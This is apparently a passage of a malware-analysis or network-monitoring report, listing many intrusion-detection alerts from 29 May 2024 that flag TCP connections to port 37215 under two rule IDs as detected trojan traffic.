                Timestamp:05/29/24-15:16:20.839821
                SID:2835222
                Source Port:57378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618692
                SID:2835222
                Source Port:60182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.899589
                SID:2835222
                Source Port:35586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684750
                SID:2829579
                Source Port:48220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898451
                SID:2835222
                Source Port:56852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141307
                SID:2835222
                Source Port:47738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.544361
                SID:2835222
                Source Port:32814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421449
                SID:2835222
                Source Port:58150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583822
                SID:2835222
                Source Port:44074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994419
                SID:2829579
                Source Port:40348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162361
                SID:2829579
                Source Port:52166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381817
                SID:2829579
                Source Port:43402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517704
                SID:2829579
                Source Port:55458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.080568
                SID:2835222
                Source Port:53470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613313
                SID:2829579
                Source Port:58866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629025
                SID:2835222
                Source Port:55616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.704982
                SID:2835222
                Source Port:35316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993146
                SID:2829579
                Source Port:49796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417877
                SID:2835222
                Source Port:45802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449703
                SID:2829579
                Source Port:33142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763158
                SID:2835222
                Source Port:44386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980036
                SID:2835222
                Source Port:34642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076356
                SID:2835222
                Source Port:49176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664494
                SID:2835222
                Source Port:33458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.234038
                SID:2835222
                Source Port:50848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985366
                SID:2835222
                Source Port:42938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135367
                SID:2829579
                Source Port:42430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958737
                SID:2829579
                Source Port:53446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711893
                SID:2829579
                Source Port:51822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222458
                SID:2835222
                Source Port:45778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288296
                SID:2835222
                Source Port:58896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824136
                SID:2835222
                Source Port:46810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226828
                SID:2835222
                Source Port:54614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948905
                SID:2835222
                Source Port:51278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076585
                SID:2835222
                Source Port:48620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.129115
                SID:2829579
                Source Port:53466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532395
                SID:2829579
                Source Port:51818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.798251
                SID:2835222
                Source Port:44728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667221
                SID:2835222
                Source Port:42658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558307
                SID:2835222
                Source Port:59798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.075838
                SID:2829579
                Source Port:56970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790761
                SID:2835222
                Source Port:38160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762667
                SID:2829579
                Source Port:36896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919476
                SID:2829579
                Source Port:56364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154944
                SID:2829579
                Source Port:51200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531585
                SID:2835222
                Source Port:53610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964596
                SID:2835222
                Source Port:39236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718534
                SID:2829579
                Source Port:55530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771171
                SID:2835222
                Source Port:46542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287019
                SID:2835222
                Source Port:60318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335339
                SID:2835222
                Source Port:37052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583744
                SID:2829579
                Source Port:33456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279462
                SID:2829579
                Source Port:46068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557068
                SID:2835222
                Source Port:33214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088011
                SID:2835222
                Source Port:33402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842303
                SID:2829579
                Source Port:39534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.898229
                SID:2829579
                Source Port:33986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873030
                SID:2835222
                Source Port:47458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966509
                SID:2829579
                Source Port:40278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269589
                SID:2835222
                Source Port:38160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.824050
                SID:2835222
                Source Port:57976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.889860
                SID:2835222
                Source Port:36380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584260
                SID:2835222
                Source Port:33106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088638
                SID:2829579
                Source Port:48820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944687
                SID:2835222
                Source Port:33070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819001
                SID:2829579
                Source Port:41606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584240
                SID:2835222
                Source Port:60974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465373
                SID:2835222
                Source Port:34280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630550
                SID:2835222
                Source Port:37924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508172
                SID:2835222
                Source Port:58858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612009
                SID:2835222
                Source Port:36030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681858
                SID:2835222
                Source Port:40684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.907168
                SID:2835222
                Source Port:41666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572284
                SID:2835222
                Source Port:49412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559963
                SID:2829579
                Source Port:47324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567788
                SID:2829579
                Source Port:48074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560115
                SID:2835222
                Source Port:54866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.812257
                SID:2829579
                Source Port:53918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.323035
                SID:2835222
                Source Port:44756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166479
                SID:2829579
                Source Port:48436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810126
                SID:2835222
                Source Port:39790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959404
                SID:2835222
                Source Port:33976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421144
                SID:2829579
                Source Port:54460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858223
                SID:2835222
                Source Port:46006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555792
                SID:2835222
                Source Port:40462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526053
                SID:2829579
                Source Port:43336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795014
                SID:2835222
                Source Port:51806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612324
                SID:2835222
                Source Port:58698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419303
                SID:2829579
                Source Port:33922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263918
                SID:2835222
                Source Port:50636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236221
                SID:2835222
                Source Port:44716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432764
                SID:2835222
                Source Port:47314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839682
                SID:2835222
                Source Port:41016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982014
                SID:2835222
                Source Port:46488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292641
                SID:2835222
                Source Port:33834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959170
                SID:2835222
                Source Port:59830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957644
                SID:2835222
                Source Port:55994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854356
                SID:2835222
                Source Port:37926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.440122
                SID:2829579
                Source Port:54328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170230
                SID:2835222
                Source Port:35090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440899
                SID:2829579
                Source Port:57348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.940235
                SID:2835222
                Source Port:51112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321683
                SID:2829579
                Source Port:46178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.047713
                SID:2829579
                Source Port:44380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877821
                SID:2835222
                Source Port:35482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.450888
                SID:2835222
                Source Port:47168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.007659
                SID:2835222
                Source Port:42462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226704
                SID:2829579
                Source Port:39830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137109
                SID:2829579
                Source Port:49470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994633
                SID:2835222
                Source Port:45236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586284
                SID:2835222
                Source Port:51198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881875
                SID:2835222
                Source Port:60232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688896
                SID:2829579
                Source Port:49716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.722279
                SID:2835222
                Source Port:58594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834525
                SID:2829579
                Source Port:33452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036698
                SID:2835222
                Source Port:33052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501796
                SID:2829579
                Source Port:60004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.270367
                SID:2829579
                Source Port:34698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209353
                SID:2829579
                Source Port:46786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209309
                SID:2829579
                Source Port:58846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.092230
                SID:2829579
                Source Port:53126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900286
                SID:2835222
                Source Port:59692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026740
                SID:2835222
                Source Port:45996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662534
                SID:2835222
                Source Port:58756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329162
                SID:2829579
                Source Port:53892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269145
                SID:2835222
                Source Port:39554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897427
                SID:2829579
                Source Port:44234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141051
                SID:2829579
                Source Port:43968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794244
                SID:2829579
                Source Port:57314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965293
                SID:2835222
                Source Port:55602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.972098
                SID:2835222
                Source Port:38062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624531
                SID:2829579
                Source Port:48822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782617
                SID:2835222
                Source Port:60902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864448
                SID:2829579
                Source Port:47960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321284
                SID:2835222
                Source Port:32956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732824
                SID:2829579
                Source Port:55548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824475
                SID:2829579
                Source Port:34810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533863
                SID:2829579
                Source Port:35324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166310
                SID:2835222
                Source Port:40504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948732
                SID:2829579
                Source Port:51514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574028
                SID:2829579
                Source Port:33552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653812
                SID:2829579
                Source Port:36400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840766
                SID:2829579
                Source Port:40838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948513
                SID:2829579
                Source Port:60806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586851
                SID:2829579
                Source Port:58102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653345
                SID:2835222
                Source Port:53654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664090
                SID:2829579
                Source Port:58788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.062062
                SID:2835222
                Source Port:60108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325982
                SID:2835222
                Source Port:54348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237616
                SID:2835222
                Source Port:60394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223401
                SID:2829579
                Source Port:47318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319400
                SID:2829579
                Source Port:52678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653126
                SID:2829579
                Source Port:39388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.823589
                SID:2829579
                Source Port:36116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075450
                SID:2829579
                Source Port:59462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.663988
                SID:2829579
                Source Port:59686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.869565
                SID:2835222
                Source Port:41268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533370
                SID:2835222
                Source Port:40668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967425
                SID:2829579
                Source Port:52652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419991
                SID:2835222
                Source Port:37192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805829
                SID:2829579
                Source Port:58496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014954
                SID:2835222
                Source Port:56788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782756
                SID:2829579
                Source Port:60466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263049
                SID:2835222
                Source Port:54876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782895
                SID:2829579
                Source Port:53100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.224004
                SID:2835222
                Source Port:33842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830790
                SID:2829579
                Source Port:52136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929749
                SID:2835222
                Source Port:52038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947694
                SID:2829579
                Source Port:56736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277743
                SID:2835222
                Source Port:54534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871763
                SID:2835222
                Source Port:39324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583852
                SID:2835222
                Source Port:34592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840728
                SID:2835222
                Source Port:57446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945701
                SID:2829579
                Source Port:58614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166397
                SID:2835222
                Source Port:55830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617595
                SID:2829579
                Source Port:50442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225393
                SID:2835222
                Source Port:37642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654432
                SID:2835222
                Source Port:36194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169250
                SID:2835222
                Source Port:43600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944969
                SID:2835222
                Source Port:49096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.327982
                SID:2835222
                Source Port:42480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630003
                SID:2829579
                Source Port:59478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951647
                SID:2829579
                Source Port:39932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.235312
                SID:2835222
                Source Port:34620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948443
                SID:2829579
                Source Port:48608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722382
                SID:2835222
                Source Port:54788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173295
                SID:2829579
                Source Port:36988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228163
                SID:2829579
                Source Port:40792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.108971
                SID:2829579
                Source Port:49166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796719
                SID:2835222
                Source Port:52528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675165
                SID:2829579
                Source Port:60824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784136
                SID:2829579
                Source Port:33642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716288
                SID:2829579
                Source Port:42902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563511
                SID:2829579
                Source Port:47294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716467
                SID:2835222
                Source Port:33504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610847
                SID:2829579
                Source Port:47270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.116531
                SID:2829579
                Source Port:42460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584541
